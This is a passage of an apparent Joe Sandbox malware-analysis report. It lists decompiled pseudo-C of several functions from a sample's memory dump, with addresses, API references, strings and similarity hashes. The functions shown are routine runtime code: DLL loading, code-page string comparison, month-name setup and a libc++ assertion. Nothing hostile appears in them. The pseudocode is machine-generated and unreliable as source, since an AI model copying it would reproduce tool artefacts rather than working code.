							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x1245e8 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = L000F3CC9(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = L000F3CC9(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}

0x000f6220
0x000f62b5
0x000f6228
0x000f622a
0x000f6234
0x000f6239
0x000f6246
0x000f625b
0x000f625f
0x000f62c5
0x000f62ca
0x000f62d1
0x000f62d5
0x000f62d8
0x000f62d8
0x000f62de
0x000f62de
0x000f62c0
0x000f62c4
0x000f62c4
0x000f6261
0x000f626a
0x000f62a3
0x000f62b0
0x000f62b2
0x000f62b2
0x00000000
0x000f62b2
0x000f6274
0x000f6279
0x000f627e
0x00000000
0x00000000
0x000f6288
0x000f628d
0x000f6292
0x00000000
0x00000000
0x000f6297
0x000f629d
0x000f62a1
0x00000000
0x00000000
0x00000000
0x000f62a1
0x000f623e
0x00000000
0x00000000
0x00000000
0x000f6244
0x000f62be
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,000F6324,?,?,00000000,?,00000003,?,000F6171,00000018,AppPolicyGetProcessTerminationMethod,001095B8,AppPolicyGetProcessTerminationMethod,00000000), ref: 000F62D8

Strings

ext-ms-, xrefs: 000F6282
api-ms-, xrefs: 000F626E

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 509a0878309a484058eaf932197cef3f2d012aa6c4cd648a7fdb4d2d494a4e34
Instruction ID: 9580c91abc195be753d7bd5e988059350104b9374f97c67f709c8d9b99dc0c2d
Opcode Fuzzy Hash: 509a0878309a484058eaf932197cef3f2d012aa6c4cd648a7fdb4d2d494a4e34
Instruction Fuzzy Hash: 30210A31A01A18ABCB719B60ED81ABE3798EF41770F254110EE45F7E91DB75EE01EAD0

Uniqueness

Uniqueness Score: -1.00%

Function 000FD00C Relevance: 9.2, APIs: 6, Instructions: 248
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E000FD00C(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, int _a20, intOrPtr* _a24, intOrPtr* _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				int _t54;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t64;
				signed int _t65;
				int _t71;
				char* _t76;
				char* _t77;
				int _t81;
				int _t82;
				intOrPtr _t94;
				intOrPtr _t95;
				signed int _t103;
				void* _t104;
				int _t106;
				void* _t107;
				intOrPtr* _t108;

				_t49 =  *0x120014; // 0xf049169a
				_v8 = _t49 ^ _t103;
				_t83 = _a24;
				_v40 = _a4;
				_t102 = _a20;
				_v44 = _a8;
				_t53 = _a16;
				_v32 = _a16;
				_v36 = _a24;
				if(_t102 <= 0) {
					if(_t102 < 0xffffffff) {
						goto L54;
					} else {
						goto L3;
					}
				} else {
					_t81 = L00100E9F(_t53, _t102);
					_t83 = _v36;
					_t102 = _t81;
					L3:
					_t101 = _a28;
					if(_t101 <= 0) {
						if(_t101 < 0xffffffff) {
							goto L54;
						} else {
							goto L6;
						}
					} else {
						_t101 = L00100E9F(_t83, _t101);
						_a28 = _t101;
						L6:
						_t82 = _a32;
						if(_t82 == 0) {
							_t82 =  *( *_v40 + 8);
							_a32 = _t82;
						}
						if(_t102 == 0 || _t101 == 0) {
							if(_t102 == _t101) {
								L61:
								_push(2);
								goto L23;
							} else {
								if(_t101 > 1) {
									L32:
									_t54 = 1;
								} else {
									if(_t102 > 1) {
										L22:
										_push(3);
										goto L23;
									} else {
										if(GetCPInfo(_t82,  &_v28) == 0) {
											goto L54;
										} else {
											if(_t102 <= 0) {
												if(_t101 <= 0) {
													goto L33;
												} else {
													if(_v28 >= 2) {
														_t76 =  &_v22;
														if(_v22 != 0) {
															_t101 = _v36;
															while(1) {
																_t94 =  *((intOrPtr*)(_t76 + 1));
																if(_t94 == 0) {
																	goto L32;
																}
																_t100 =  *_t101;
																if(_t100 <  *_t76 || _t100 > _t94) {
																	_t76 = _t76 + 2;
																	if( *_t76 != 0) {
																		continue;
																	} else {
																		goto L32;
																	}
																} else {
																	goto L61;
																}
																goto L55;
															}
														}
													}
													goto L32;
												}
											} else {
												if(_v28 >= 2) {
													_t77 =  &_v22;
													if(_v22 != 0) {
														_t102 = _v32;
														while(1) {
															_t95 =  *((intOrPtr*)(_t77 + 1));
															if(_t95 == 0) {
																goto L22;
															}
															_t100 =  *_t102;
															if(_t100 <  *_t77 || _t100 > _t95) {
																_t77 = _t77 + 2;
																if( *_t77 != 0) {
																	continue;
																} else {
																	goto L22;
																}
															} else {
																goto L61;
															}
															goto L23;
														}
													}
												}
												goto L22;
												L23:
												_pop(_t54);
											}
										}
									}
								}
							}
						} else {
							L33:
							_t59 = E000F840F(_t82, 9, _v32, _t102, 0, 0);
							_t106 = _t104 + 0x18;
							_v40 = _t59;
							if(_t59 == 0) {
								L54:
								_t54 = 0;
							} else {
								_t100 = _t59 + _t59 + 8;
								asm("sbb eax, eax");
								_t60 = _t59 & _t59 + _t59 + 0x00000008;
								if(_t60 == 0) {
									L60:
									_push(0);
									goto L59;
								} else {
									if(_t60 > 0x400) {
										_t82 = E000A2990(_t60);
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xdddd;
											goto L40;
										}
									} else {
										L000DEF30(_t60);
										_t82 = _t106;
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xcccc;
											L40:
											_t82 = _t82 + 8;
											if(_t82 == 0) {
												goto L60;
											} else {
												_t102 = _a32;
												_t63 = E000F840F(_a32, 1, _v32, _a32, _t82, _v40);
												_t107 = _t106 + 0x18;
												if(_t63 == 0) {
													L58:
													_push(_t82);
													L59:
													L000F4F77();
													goto L53;
												} else {
													_t101 = _v36;
													_t64 = E000F840F(_t102, 9, _v36, _v36, 0, 0);
													_t108 = _t107 + 0x18;
													_v32 = _t64;
													if(_t64 == 0) {
														goto L58;
													} else {
														_t100 = _t64 + _t64 + 8;
														asm("sbb eax, eax");
														_t65 = _t64 & _t64 + _t64 + 0x00000008;
														if(_t65 == 0) {
															L57:
															_push(0);
															goto L52;
														} else {
															if(_t65 > 0x400) {
																_t101 = E000A2990(_t65);
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xdddd;
																	goto L49;
																}
															} else {
																L000DEF30(_t65);
																_t101 = _t108;
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xcccc;
																	L49:
																	_t101 = _t101 + 8;
																	if(_t101 == 0) {
																		goto L57;
																	} else {
																		if(E000F840F(_t102, 1, _v36, _a28, _t101, _v32) != 0) {
																			_t71 = L000F5CD5(_v44, _a12, _t82, _v40, _t101, _v32, 0, 0, 0);
																			_t102 = _t71;
																			L000F4F77(_t101);
																			L000F4F77(_t82);
																			_t54 = _t71;
																		} else {
																			_push(_t101);
																			L52:
																			L000F4F77();
																			L000F4F77(_t82);
																			L53:
																			goto L54;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L55:
				return E000DE643(_t54, _t82, _v8 ^ _t103, _t100, _t101, _t102);
			}

0x000fd014
0x000fd01b
0x000fd021
0x000fd025
0x000fd02c
0x000fd02f
0x000fd032
0x000fd035
0x000fd038
0x000fd03e
0x000fd053
0x00000000
0x00000000
0x00000000
0x00000000
0x000fd040
0x000fd042
0x000fd049
0x000fd04c
0x000fd059
0x000fd059
0x000fd05e
0x000fd073
0x00000000
0x00000000
0x00000000
0x00000000
0x000fd060
0x000fd068
0x000fd06b
0x000fd079
0x000fd079
0x000fd07e
0x000fd085
0x000fd088
0x000fd088
0x000fd08d
0x000fd099
0x000fd2a4
0x000fd2a4
0x00000000
0x000fd09f
0x000fd0a2
0x000fd12e
0x000fd130
0x000fd0a8
0x000fd0ab
0x000fd0f3
0x000fd0f3
0x00000000
0x000fd0ad
0x000fd0ba
0x00000000
0x000fd0c0
0x000fd0c2
0x000fd0fd
0x00000000
0x000fd0ff
0x000fd103
0x000fd109
0x000fd10c
0x000fd10e
0x000fd111
0x000fd111
0x000fd116
0x00000000
0x00000000
0x000fd118
0x000fd11c
0x000fd126
0x000fd12c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000fd11c
0x000fd111
0x000fd10c
0x00000000
0x000fd103
0x000fd0c4
0x000fd0c8
0x000fd0ce
0x000fd0d1
0x000fd0d3
0x000fd0d6
0x000fd0d6
0x000fd0db
0x00000000
0x00000000
0x000fd0dd
0x000fd0e1
0x000fd0eb
0x000fd0f1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000fd0e1
0x000fd0d6
0x000fd0d1
0x00000000
0x000fd0f5
0x000fd0f5
0x000fd0f5
0x000fd0c2
0x000fd0ba
0x000fd0ab
0x000fd0a2
0x000fd136
0x000fd136
0x000fd141
0x000fd146
0x000fd149
0x000fd14e
0x000fd254
0x000fd254
0x000fd154
0x000fd157
0x000fd15c
0x000fd15e
0x000fd160
0x000fd2a0
0x000fd2a0
0x00000000
0x000fd166
0x000fd16b
0x000fd18a
0x000fd18f
0x00000000
0x000fd195
0x000fd195
0x00000000
0x000fd195
0x000fd16d
0x000fd16d
0x000fd172
0x000fd176
0x00000000
0x000fd17c
0x000fd17c
0x000fd19b
0x000fd19b
0x000fd1a0
0x00000000
0x000fd1a6
0x000fd1ae
0x000fd1b4
0x000fd1b9
0x000fd1be
0x000fd298
0x000fd298
0x000fd299
0x000fd299
0x00000000
0x000fd1c4
0x000fd1c9
0x000fd1d0
0x000fd1d5
0x000fd1d8
0x000fd1dd
0x00000000
0x000fd1e3
0x000fd1e6
0x000fd1eb
0x000fd1ed
0x000fd1ef
0x000fd294
0x000fd294
0x00000000
0x000fd1f5
0x000fd1fa
0x000fd219
0x000fd21e
0x00000000
0x000fd220
0x000fd220
0x00000000
0x000fd220
0x000fd1fc
0x000fd1fc
0x000fd201
0x000fd205
0x00000000
0x000fd20b
0x000fd20b
0x000fd226
0x000fd226
0x000fd22b
0x00000000
0x000fd22d
0x000fd244
0x000fd27b
0x000fd281
0x000fd283
0x000fd289
0x000fd290
0x000fd246
0x000fd246
0x000fd247
0x000fd247
0x000fd24d
0x000fd253
0x00000000
0x000fd253
0x000fd244
0x000fd22b
0x000fd205
0x000fd1fa
0x000fd1ef
0x000fd1dd
0x000fd1be
0x000fd1a0
0x000fd176
0x000fd16b
0x000fd160
0x000fd14e
0x000fd08d
0x000fd05e
0x000fd256
0x000fd267

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,000FCFF7,00000000,00000000,00000000,00000001,?,?,?,?,00000001,00000000), ref: 000FD0B2
__freea.LIBCMT ref: 000FD247
__freea.LIBCMT ref: 000FD24D
__freea.LIBCMT ref: 000FD283
__freea.LIBCMT ref: 000FD289
__freea.LIBCMT ref: 000FD299

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: __freea$Info
String ID:
API String ID: 541289543-0
Opcode ID: 1b3e2b70eca45cce07348b7534bfeb8f54205de336659696a69d369d73c02cb0
Instruction ID: faf20a15ba4a8482721a042a1cb0151954c49ca5cc8bd0962853a336cc61570e
Opcode Fuzzy Hash: 1b3e2b70eca45cce07348b7534bfeb8f54205de336659696a69d369d73c02cb0
Instruction Fuzzy Hash: AF71A07290424D6BDF719BA48C41BFF77E7AF55310F29005AEB04ABA82DB35D801E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00091510 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 289
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00091510(void* __fp0) {
				void* __ebx;
				void* __edi;
				intOrPtr _t23;
				intOrPtr _t25;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;
				signed int _t42;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr* _t77;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t85;
				intOrPtr* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t123;

				_t123 = __fp0;
				_t23 =  *0x1265f8; // 0x0
				_t42 =  *0x123e38; // 0x0
				_t43 =  *((intOrPtr*)( *[fs:0x2c] + _t42 * 4));
				if(_t23 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t42 * 4)) + 4))) {
					L000DDC67(_t23, 0x1265f8);
					__eflags =  *0x1265f8 - 0xffffffff;
					if(__eflags == 0) {
						E000DDF39(_t43, __eflags, E00093100);
						L000DDCDD(0x1265f8);
					}
				}
				if( *0x1264e3 < 0) {
					 *0x1264dc = 7;
					_t71 =  *0x1264d8; // 0x0
				} else {
					_t71 = 0x1264d8;
					E0007A150(_t39, 0x1264d8, _t69, _t123, 7);
				}
				 *((intOrPtr*)(_t71 + 3)) = 0x79726175;
				 *_t71 = 0x756e614a;
				 *((char*)(_t71 + 7)) = 0;
				if( *0x1264ef < 0) {
					 *0x1264e8 = 8;
					_t72 =  *0x1264e4; // 0x0
				} else {
					_t72 = 0x1264e4;
					E0007A150(_t39, 0x1264e4, _t69, _t123, 8);
				}
				 *((intOrPtr*)(_t72 + 4)) = 0x79726175;
				 *_t72 = 0x72626546;
				 *((char*)(_t72 + 8)) = 0;
				if( *0x1264fb < 0) {
					 *0x1264f4 = 5;
					_t73 =  *0x1264f0; // 0x0
				} else {
					_t73 = 0x1264f0;
					E0007A150(_t39, 0x1264f0, _t69, _t123, 5);
				}
				 *_t73 = 0x6372614d;
				 *((short*)(_t73 + 4)) = 0x68;
				if( *0x126507 < 0) {
					 *0x126500 = 5;
					_t74 =  *0x1264fc; // 0x0
				} else {
					_t74 = 0x1264fc;
					E0007A150(_t39, 0x1264fc, _t69, _t123, 5);
				}
				 *_t74 = 0x69727041;
				 *((short*)(_t74 + 4)) = 0x6c;
				if( *0x126513 < 0) {
					 *0x12650c = 3;
					_t75 =  *0x126508; // 0x0
				} else {
					_t75 = 0x126508;
					E0007A150(_t39, 0x126508, _t69, _t123, 3);
				}
				 *_t75 = 0x79614d;
				if( *0x12651f < 0) {
					 *0x126518 = 4;
					_t76 =  *0x126514; // 0x0
				} else {
					_t76 = 0x126514;
					E0007A150(_t39, 0x126514, _t69, _t123, 4);
				}
				 *_t76 = 0x656e754a;
				 *((char*)(_t76 + 4)) = 0;
				if( *0x12652b < 0) {
					 *0x126524 = 4;
					_t77 =  *0x126520; // 0x0
				} else {
					_t77 = 0x126520;
					E0007A150(_t39, 0x126520, _t69, _t123, 4);
				}
				 *_t77 = 0x796c754a;
				 *((char*)(_t77 + 4)) = 0;
				if( *0x126537 < 0) {
					 *0x126530 = 6;
					_t78 =  *0x12652c; // 0x0
				} else {
					_t78 = 0x12652c;
					E0007A150(_t39, 0x12652c, _t69, _t123, 6);
				}
				 *((short*)(_t78 + 4)) = 0x7473;
				 *_t78 = 0x75677541;
				 *((char*)(_t78 + 6)) = 0;
				if( *0x126543 < 0) {
					 *0x12653c = 9;
					_t79 =  *0x126538; // 0x0
				} else {
					_t79 = 0x126538;
					E0007A150(_t39, 0x126538, _t69, _t123, 9);
				}
				 *((intOrPtr*)(_t79 + 4)) = 0x65626d65;
				 *_t79 = 0x74706553;
				 *((short*)(_t79 + 8)) = 0x72;
				if( *0x12654f < 0) {
					 *0x126548 = 7;
					_t80 =  *0x126544; // 0x0
				} else {
					_t80 = 0x126544;
					E0007A150(_t39, 0x126544, _t69, _t123, 7);
				}
				 *((intOrPtr*)(_t80 + 3)) = 0x7265626f;
				 *_t80 = 0x6f74634f;
				 *((char*)(_t80 + 7)) = 0;
				if( *0x12655b < 0) {
					 *0x126554 = 8;
					_t40 =  *0x126550; // 0x0
				} else {
					_t40 = 0x126550;
					E0007A150(0x126550, 0x126550, _t69, _t123, 8);
				}
				_t25 = 0x65766f4e;
				 *_t40 = 0x65766f4e;
				 *((intOrPtr*)(_t40 + 4)) = 0x7265626d;
				 *((char*)(_t40 + 8)) = 0;
				if( *0x126567 < 0) {
					 *0x126560 = 8;
					_t41 =  *0x12655c; // 0x0
				} else {
					_t41 = 0x12655c;
					_t25 = E0007A150(0x12655c, 0x12655c, 0x65636544, _t123, 8);
				}
				 *_t41 = 0x65636544;
				 *((intOrPtr*)(_t41 + 4)) = 0x7265626d;
				 *((char*)(_t41 + 8)) = 0;
				if( *0x126573 < 0) {
					 *0x12656c = 3;
					_t82 =  *0x126568; // 0x0
				} else {
					_t82 = 0x126568;
					_t25 = E0007A150(_t41, 0x126568, 0x65636544, _t123, 3);
				}
				 *_t82 = 0x6e614a;
				if( *0x12657f < 0) {
					 *0x126578 = 3;
					_t83 =  *0x126574; // 0x0
				} else {
					_t83 = 0x126574;
					_t25 = E0007A150(_t41, 0x126574, 0x65636544, _t123, 3);
				}
				 *_t83 = 0x626546;
				if( *0x12658b < 0) {
					 *0x126584 = 3;
					_t84 =  *0x126580; // 0x0
				} else {
					_t84 = 0x126580;
					_t25 = E0007A150(_t41, 0x126580, 0x65636544, _t123, 3);
				}
				 *_t84 = 0x72614d;
				if( *0x126597 < 0) {
					 *0x126590 = 3;
					_t85 =  *0x12658c; // 0x0
				} else {
					_t85 = 0x12658c;
					_t25 = E0007A150(_t41, 0x12658c, 0x65636544, _t123, 3);
				}
				 *_t85 = 0x727041;
				if( *0x1265a3 < 0) {
					 *0x12659c = 3;
					_t86 =  *0x126598; // 0x0
				} else {
					_t86 = 0x126598;
					_t25 = E0007A150(_t41, 0x126598, 0x65636544, _t123, 3);
				}
				 *_t86 = 0x79614d;
				if( *0x1265af < 0) {
					 *0x1265a8 = 3;
					_t87 =  *0x1265a4; // 0x0
				} else {
					_t87 = 0x1265a4;
					_t25 = E0007A150(_t41, 0x1265a4, 0x65636544, _t123, 3);
				}
				 *_t87 = 0x6e754a;
				if( *0x1265bb < 0) {
					 *0x1265b4 = 3;
					_t88 =  *0x1265b0; // 0x0
				} else {
					_t88 = 0x1265b0;
					_t25 = E0007A150(_t41, 0x1265b0, 0x65636544, _t123, 3);
				}
				 *_t88 = 0x6c754a;
				if( *0x1265c7 < 0) {
					 *0x1265c0 = 3;
					_t89 =  *0x1265bc; // 0x0
				} else {
					_t89 = 0x1265bc;
					_t25 = E0007A150(_t41, 0x1265bc, 0x65636544, _t123, 3);
				}
				 *_t89 = 0x677541;
				if( *0x1265d3 < 0) {
					 *0x1265cc = 3;
					_t90 =  *0x1265c8; // 0x0
				} else {
					_t90 = 0x1265c8;
					_t25 = E0007A150(_t41, 0x1265c8, 0x65636544, _t123, 3);
				}
				 *_t90 = 0x706553;
				if( *0x1265df < 0) {
					 *0x1265d8 = 3;
					_t91 =  *0x1265d4; // 0x0
				} else {
					_t91 = 0x1265d4;
					_t25 = E0007A150(_t41, 0x1265d4, 0x65636544, _t123, 3);
				}
				 *_t91 = 0x74634f;
				if( *0x1265eb < 0) {
					 *0x1265e4 = 3;
					_t92 =  *0x1265e0; // 0x0
				} else {
					_t92 = 0x1265e0;
					_t25 = E0007A150(_t41, 0x1265e0, 0x65636544, _t123, 3);
				}
				 *_t92 = 0x766f4e;
				if( *0x1265f7 < 0) {
					 *0x1265f0 = 3;
					_t93 =  *0x1265ec; // 0x0
				} else {
					_t93 = 0x1265ec;
					_t25 = E0007A150(_t41, 0x1265ec, 0x65636544, _t123, 3);
				}
				 *_t93 = 0x636544;
				return _t25;
			}

0x00091510
0x00091516
0x0009151b
0x00091528
0x00091531
0x00091a57
0x00091a5f
0x00091a66
0x00091a71
0x00091a7e
0x00091a83
0x00091a66
0x0009153e
0x00091553
0x0009155d
0x00091540
0x00091540
0x0009154c
0x0009154c
0x00091563
0x0009156a
0x00091570
0x0009157b
0x00091590
0x0009159a
0x0009157d
0x0009157d
0x00091589
0x00091589
0x000915a0
0x000915a7
0x000915ad
0x000915b8
0x000915cd
0x000915d7
0x000915ba
0x000915ba
0x000915c6
0x000915c6
0x000915dd
0x000915e3
0x000915f0
0x00091605
0x0009160f
0x000915f2
0x000915f2
0x000915fe
0x000915fe
0x00091615
0x0009161b
0x00091628
0x0009163d
0x00091647
0x0009162a
0x0009162a
0x00091636
0x00091636
0x0009164d
0x0009165a
0x0009166f
0x00091679
0x0009165c
0x0009165c
0x00091668
0x00091668
0x0009167f
0x00091685
0x00091690
0x000916a5
0x000916af
0x00091692
0x00091692
0x0009169e
0x0009169e
0x000916b5
0x000916bb
0x000916c6
0x000916db
0x000916e5
0x000916c8
0x000916c8
0x000916d4
0x000916d4
0x000916eb
0x000916f1
0x000916f7
0x00091702
0x00091717
0x00091721
0x00091704
0x00091704
0x00091710
0x00091710
0x00091727
0x0009172e
0x00091734
0x00091741
0x00091756
0x00091760
0x00091743
0x00091743
0x0009174f
0x0009174f
0x00091766
0x0009176d
0x00091773
0x0009177e
0x00091793
0x0009179d
0x00091780
0x00091780
0x0009178c
0x0009178c
0x000917ad
0x000917b3
0x000917b5
0x000917bc
0x000917c7
0x000917dc
0x000917e6
0x000917c9
0x000917c9
0x000917d5
0x000917d5
0x000917ec
0x000917ee
0x000917f1
0x000917fc
0x00091811
0x0009181b
0x000917fe
0x000917fe
0x0009180a
0x0009180a
0x00091821
0x0009182e
0x00091843
0x0009184d
0x00091830
0x00091830
0x0009183c
0x0009183c
0x00091853
0x00091860
0x00091875
0x0009187f
0x00091862
0x00091862
0x0009186e
0x0009186e
0x00091885
0x00091892
0x000918a7
0x000918b1
0x00091894
0x00091894
0x000918a0
0x000918a0
0x000918b7
0x000918c4
0x000918d9
0x000918e3
0x000918c6
0x000918c6
0x000918d2
0x000918d2
0x000918e9
0x000918f6
0x0009190b
0x00091915
0x000918f8
0x000918f8
0x00091904
0x00091904
0x0009191b
0x00091928
0x0009193d
0x00091947
0x0009192a
0x0009192a
0x00091936
0x00091936
0x0009194d
0x0009195a
0x0009196f
0x00091979
0x0009195c
0x0009195c
0x00091968
0x00091968
0x0009197f
0x0009198c
0x000919a1
0x000919ab
0x0009198e
0x0009198e
0x0009199a
0x0009199a
0x000919b1
0x000919be
0x000919d3
0x000919dd
0x000919c0
0x000919c0
0x000919cc
0x000919cc
0x000919e3
0x000919f0
0x00091a05
0x00091a0f
0x000919f2
0x000919f2
0x000919fe
0x000919fe
0x00091a15
0x00091a22
0x00091a37
0x00091a41
0x00091a24
0x00091a24
0x00091a30
0x00091a30
0x00091a47
0x00091a51

APIs

__Init_thread_header.LIBCMT ref: 00091A57

Strings

Dece, xrefs: 000917A8
mber, xrefs: 000917A3
ober, xrefs: 00091766
mber, xrefs: 000917B5

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Init_thread_header
String ID: Dece$mber$mber$ober
API String ID: 3738618077-56014211
Opcode ID: fafa5b8c87a64d6d04aa6eef709944b7adfd661dddb436805c408788d4c02ed5
Instruction ID: a38965f3dacf23c60ceeb772f215ed3b9421b482c8971c8957dbee33f2ecd86b
Opcode Fuzzy Hash: fafa5b8c87a64d6d04aa6eef709944b7adfd661dddb436805c408788d4c02ed5
Instruction Fuzzy Hash: D1D1A470E082A1EFFB319F50B9143443FA1A741384F14846DD4892B7EAD7B969F6DB42

Uniqueness

Uniqueness Score: -1.00%

Function 0009513A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0009513A(void* __ebx, intOrPtr* __ecx, void* __fp0, char _a4) {
				intOrPtr _v24;
				void* __edi;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t22;
				char _t23;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t28;

				_t34 = __fp0;
				_t16 = __ebx;
				_t23 = _a4;
				if(_t23 == 0) {
					_push("string::append received nullptr");
					_push("__s != nullptr");
					_push(0xb23);
					_push("..\\..\\buildtools\\third_party\\libc++\\trunk\\include\\string");
					L00076D4C(__ebx, __ecx, _t22, __fp0, "%s:%d: assertion %s failed: %s");
					_push(_t23);
					_t27 = __ecx;
					_t24 = _v24;
					if( *((char*)(__ecx + 0xb)) < 0) {
						_t10 =  *((intOrPtr*)(__ecx + 4));
					} else {
						_t10 = L00071E10(__ecx, __fp0);
					}
					if(_t10 >= _t24) {
						if( *((char*)(_t27 + 0xb)) < 0) {
							_t11 =  *_t27;
							 *((intOrPtr*)(_t27 + 4)) = _t24;
							_t27 = _t11;
						} else {
							_t11 = E0007A150(_t16, _t27, _t24, _t34, _t24);
						}
						 *((char*)(_t27 + _t24)) = 0;
						return _t11;
					} else {
						return E00095026(_t27, _t34, _t24 - _t10, _a4);
					}
				}
				_t28 = __ecx;
				return L00094B30(__ebx, _t28, __fp0, _t23, E000F31A0(_t23));
			}

0x0009513a
0x0009513a
0x0009513f
0x00095144
0x00095160
0x00095165
0x0009516a
0x0009516f
0x00095179
0x00095181
0x00095183
0x00095185
0x0009518c
0x00095197
0x0009518e
0x00095190
0x00095190
0x0009519c
0x000951b3
0x000951bf
0x000951c1
0x000951c4
0x000951b5
0x000951b8
0x000951b8
0x000951c6
0x00000000
0x0009519e
0x00000000
0x000951a8
0x0009519c
0x00095146
0x0009515d

APIs

_strlen.LIBCMT ref: 00095149

Strings

%s:%d: assertion %s failed: %s, xrefs: 00095174
string::append received nullptr, xrefs: 00095160
__s != nullptr, xrefs: 00095165
..\..\buildtools\third_party\libc++\trunk\include\string, xrefs: 0009516F

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
